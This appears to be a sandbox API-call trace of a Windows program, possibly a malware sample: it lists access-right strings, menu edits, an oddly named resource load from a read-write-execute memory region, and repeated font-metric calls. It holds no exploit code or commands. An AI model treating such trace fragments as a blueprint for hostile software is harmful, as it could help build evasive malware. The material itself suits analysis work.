[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a9e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a9e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e140*="STANDARD_RIGHTS_WRITE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e130*="STANDARD_RIGHTS_READ") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e120*="STANDARD_RIGHTS_ALL") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9e110*="DELETE") returned 1
[0140.852] SysReAllocStringLen (in: pbstr=0x2a9e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9e100*="READ_CONTROL") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9e0f0*="WRITE_OWNER") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9e0e0*="WRITE_DAC") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a9e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a9e0c0*="SERVICE_STOP") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a9e0b0*="SERVICE_START") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a9e0a0*="SERVICE_QUERY_STATUS") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a9e090*="SERVICE_QUERY_CONFIG") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a9e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a9e070*="SERVICE_INTERROGATE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a9e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a9e050*="SERVICE_CHANGE_CONFIG") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a9e040*="SERVICE_ALL_ACCESS") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9e020*="STANDARD_RIGHTS_WRITE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9e010*="STANDARD_RIGHTS_READ") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9e000*="STANDARD_RIGHTS_ALL") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9dff0*="DELETE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9dfe0*="READ_CONTROL") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9dfd0*="WRITE_OWNER") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9dfc0*="WRITE_DAC") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a9dfb0*="KEY_SET_VALUE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a9dfa0*="KEY_CREATE_LINK") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a9df90*="KEY_CREATE_SUB_KEY") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a9df80*="KEY_NOTIFY") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a9df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a9df60*="KEY_QUERY_VALUE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9df40*="STANDARD_RIGHTS_WRITE") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a9df30*="STANDARD_RIGHTS_READ 2") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a9df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0140.853] SysReAllocStringLen (in: pbstr=0x2a9df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9df10*="DELETE") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9df00*="READ_CONTROL") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9def0*="WRITE_OWNER") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9dee0*="WRITE_DAC") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a9ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a9dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a9deb0*="DESKTOP_JOURNALRECORD") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a9dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a9de90*="DESKTOP_HOOKCONTROL") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a9de80*="DESKTOP_CREATEWINDOW") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a9de70*="DESKTOP_CREATEMENU") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a9de60*="DESKTOP_READOBJECTS") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a9de50*="DESKTOP_ENUMERATE") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9de30*="STANDARD_RIGHTS_WRITE") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9de20*="STANDARD_RIGHTS_READ") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a9de10*="STANDARD_RIGHTS_ALL") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a9de00*="DELETE") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9ddf0*="READ_CONTROL") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a9dde0*="WRITE_OWNER") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9ddd0*="WRITE_DAC") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a9ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a9ddb0*="WINSTA_READSCREEN") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a9dda0*="WINSTA_READATTRIBUTES") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a9dd90*="WINSTA_EXITWINDOWS") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a9dd80*="WINSTA_ENUMERATE") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a9dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a9dd60*="WINSTA_CREATEDESKTOP") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a9dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a9dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a9dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.854] SysReAllocStringLen (in: pbstr=0x2a9dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a9dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0140.855] SysReAllocStringLen (in: pbstr=0x2a9dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a9dd10*="STANDARD_RIGHTS_READ") returned 1
[0140.855] SysReAllocStringLen (in: pbstr=0x2a9dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a9dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0140.855] SysReAllocStringLen (in: pbstr=0x2a9dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a9dcf0*="READ_CONTROL") returned 1
[0140.855] SysReAllocStringLen (in: pbstr=0x2a9dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a9dce0*="SI_ACCESS_SPECIFIC") returned 1
[0140.855] SysReAllocStringLen (in: pbstr=0x2a9dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a9dcd0*="WRITE_DAC") returned 1
[0140.855] SysReAllocStringLen (in: pbstr=0x2a9dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a9dcc0*="FILE_DELETE") returned 1
[0140.855] SysReAllocStringLen (in: pbstr=0x2a9dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a9dcb0*="FILE_DELETE_CHILD") returned 1
[0140.856] SetClassLongA (hWnd=0xa01e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0140.857] GetSystemMenu (hWnd=0xa01e8, bRevert=0) returned 0xb01cd
[0140.857] DeleteMenu (hMenu=0xb01cd, uPosition=0xf030, uFlags=0x0) returned 1
[0140.857] DeleteMenu (hMenu=0xb01cd, uPosition=0xf000, uFlags=0x0) returned 1
[0140.857] DeleteMenu (hMenu=0xb01cd, uPosition=0xf010, uFlags=0x0) returned 1
[0140.857] GetCurrentThreadId () returned 0x8a0
[0140.857] ResetEvent (hEvent=0xa0) returned 1
[0140.857] GetCurrentThreadId () returned 0x8a0
[0140.857] GetCurrentThreadId () returned 0x8a0
[0140.857] GetCurrentThreadId () returned 0x8a0
[0140.857] ResetEvent (hEvent=0xa0) returned 1
[0140.857] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef1d4, fWinIni=0x0 | out: pvParam=0xef1d4) returned 1
[0140.857] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef1d4, fWinIni=0x0 | out: pvParam=0xef1d4) returned 1
[0140.857] GetSystemMetrics (nIndex=49) returned 16
[0140.857] GetSystemMetrics (nIndex=50) returned 16
[0140.857] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xef21c, fWinIni=0x0 | out: pvParam=0xef21c) returned 1
[0140.858] IsWindowVisible (hWnd=0xa01e8) returned 0
[0140.858] GetCurrentThreadId () returned 0x8a0
[0140.858] VirtualQuery (in: lpAddress=0x2a71668, lpBuffer=0xef0ec, dwLength=0x1c | out: lpBuffer=0xef0ec*(BaseAddress=0x2a71000, AllocationBase=0x29b0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0140.858] FindResourceA (hModule=0x29b0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2ab8990
[0140.858] FindResourceA (hModule=0x29b0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2ab8990
[0140.858] LoadResource (hModule=0x29b0000, hResInfo=0x2ab8990) returned 0x2abf044
[0140.858] SizeofResource (hModule=0x29b0000, hResInfo=0x2ab8990) returned 0xca5
[0140.858] LockResource (hResData=0x2abf044) returned 0x2abf044
[0140.858] GetCurrentThreadId () returned 0x8a0
[0140.858] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xeeea0, fWinIni=0x0 | out: pvParam=0xeeea0) returned 1
[0140.858] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xeeea0, fWinIni=0x0 | out: pvParam=0xeeea0) returned 1
[0140.858] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xeeea0, fWinIni=0x0 | out: pvParam=0xeeea0) returned 1
[0140.858] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xeeea0, fWinIni=0x0 | out: pvParam=0xeeea0) returned 1
[0140.859] GetDC (hWnd=0x0) returned 0x5501085a
[0140.859] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee84 | out: lptm=0xeee84) returned 1
[0140.859] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0140.861] CreateFontIndirectA (lplf=0xeee3c) returned 0x270a0889
[0140.861] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.861] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeebc | out: lptm=0xeeebc) returned 1
[0140.861] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.861] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.861] GetSystemMetrics (nIndex=6) returned 1
[0140.861] VirtualAlloc (lpAddress=0x2ad4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ad4000
[0140.862] GetDC (hWnd=0x0) returned 0x5501085a
[0140.862] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee84 | out: lptm=0xeee84) returned 1
[0140.862] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.862] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeebc | out: lptm=0xeeebc) returned 1
[0140.862] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.862] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.862] GetSystemMetrics (nIndex=6) returned 1
[0140.862] GetDC (hWnd=0x0) returned 0x5501085a
[0140.862] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee84 | out: lptm=0xeee84) returned 1
[0140.862] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.862] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeebc | out: lptm=0xeeebc) returned 1
[0140.862] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.862] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.862] GetSystemMetrics (nIndex=6) returned 1
[0140.863] GetDC (hWnd=0x0) returned 0x5501085a
[0140.863] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee84 | out: lptm=0xeee84) returned 1
[0140.863] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.863] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeebc | out: lptm=0xeeebc) returned 1
[0140.863] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.863] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.863] GetSystemMetrics (nIndex=6) returned 1
[0140.863] GetDC (hWnd=0x0) returned 0x5501085a
[0140.863] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee98 | out: lptm=0xeee98) returned 1
[0140.863] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.863] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeed0 | out: lptm=0xeeed0) returned 1
[0140.863] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.863] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.863] GetSystemMetrics (nIndex=6) returned 1
[0140.864] GetDC (hWnd=0x0) returned 0x5501085a
[0140.864] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeb9c | out: lptm=0xeeb9c) returned 1
[0140.864] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.864] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeebd4 | out: lptm=0xeebd4) returned 1
[0140.864] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.864] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.864] GetSystemMetrics (nIndex=6) returned 1
[0140.864] GetDC (hWnd=0x0) returned 0x5501085a
[0140.864] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee98 | out: lptm=0xeee98) returned 1
[0140.864] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.864] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeed0 | out: lptm=0xeeed0) returned 1
[0140.864] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.864] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.864] GetSystemMetrics (nIndex=6) returned 1
[0140.864] GetDC (hWnd=0x0) returned 0x5501085a
[0140.864] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeb9c | out: lptm=0xeeb9c) returned 1
[0140.865] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.865] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeebd4 | out: lptm=0xeebd4) returned 1
[0140.865] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.865] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.865] GetSystemMetrics (nIndex=6) returned 1
[0140.865] GetDC (hWnd=0x0) returned 0x5501085a
[0140.865] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee98 | out: lptm=0xeee98) returned 1
[0140.865] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.865] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeed0 | out: lptm=0xeeed0) returned 1
[0140.865] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.865] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.865] GetSystemMetrics (nIndex=6) returned 1
[0140.865] GetDC (hWnd=0x0) returned 0x5501085a
[0140.865] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeb9c | out: lptm=0xeeb9c) returned 1
[0140.865] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.865] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeebd4 | out: lptm=0xeebd4) returned 1
[0140.865] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.865] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.866] GetSystemMetrics (nIndex=6) returned 1
[0140.866] GetDC (hWnd=0x0) returned 0x5501085a
[0140.866] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee84 | out: lptm=0xeee84) returned 1
[0140.866] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.866] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeebc | out: lptm=0xeeebc) returned 1
[0140.866] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.866] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.866] GetSystemMetrics (nIndex=6) returned 1
[0140.866] GetDC (hWnd=0x0) returned 0x5501085a
[0140.866] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee84 | out: lptm=0xeee84) returned 1
[0140.867] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.867] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeebc | out: lptm=0xeeebc) returned 1
[0140.867] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.867] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.867] GetSystemMetrics (nIndex=6) returned 1
[0140.867] GetDC (hWnd=0x0) returned 0x5501085a
[0140.867] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee98 | out: lptm=0xeee98) returned 1
[0140.867] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.867] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeed0 | out: lptm=0xeeed0) returned 1
[0140.867] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.867] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.867] GetSystemMetrics (nIndex=6) returned 1
[0140.867] GetDC (hWnd=0x0) returned 0x5501085a
[0140.867] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeb9c | out: lptm=0xeeb9c) returned 1
[0140.867] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.867] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeebd4 | out: lptm=0xeebd4) returned 1
[0140.867] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.867] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.868] GetSystemMetrics (nIndex=6) returned 1
[0140.868] GetDC (hWnd=0x0) returned 0x5501085a
[0140.868] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee98 | out: lptm=0xeee98) returned 1
[0140.868] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.868] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeed0 | out: lptm=0xeeed0) returned 1
[0140.868] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.868] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.868] GetSystemMetrics (nIndex=6) returned 1
[0140.868] GetDC (hWnd=0x0) returned 0x5501085a
[0140.868] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeb9c | out: lptm=0xeeb9c) returned 1
[0140.868] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.868] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeebd4 | out: lptm=0xeebd4) returned 1
[0140.868] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.868] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.868] GetSystemMetrics (nIndex=6) returned 1
[0140.869] GetDC (hWnd=0x0) returned 0x5501085a
[0140.869] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee98 | out: lptm=0xeee98) returned 1
[0140.869] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.869] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeed0 | out: lptm=0xeeed0) returned 1
[0140.869] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.869] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.869] GetSystemMetrics (nIndex=6) returned 1
[0140.869] GetDC (hWnd=0x0) returned 0x5501085a
[0140.869] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeb9c | out: lptm=0xeeb9c) returned 1
[0140.869] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.869] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeebd4 | out: lptm=0xeebd4) returned 1
[0140.869] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.869] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.869] GetSystemMetrics (nIndex=6) returned 1
[0140.870] GetDC (hWnd=0x0) returned 0x5501085a
[0140.870] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeee98 | out: lptm=0xeee98) returned 1
[0140.870] SelectObject (hdc=0x5501085a, h=0x270a0889) returned 0x18a002e
[0140.870] GetTextMetricsA (in: hdc=0x5501085a, lptm=0xeeed0 | out: lptm=0xeeed0) returned 1
[0140.870] SelectObject (hdc=0x5501085a, h=0x18a002e) returned 0x270a0889
[0140.870] ReleaseDC (hWnd=0x0, hDC=0x5501085a) returned 1
[0140.870] GetSystemMetrics (nIndex=6) returned 1
[0140.870] GetDC (hWnd=0x0) returned 0x5501085a
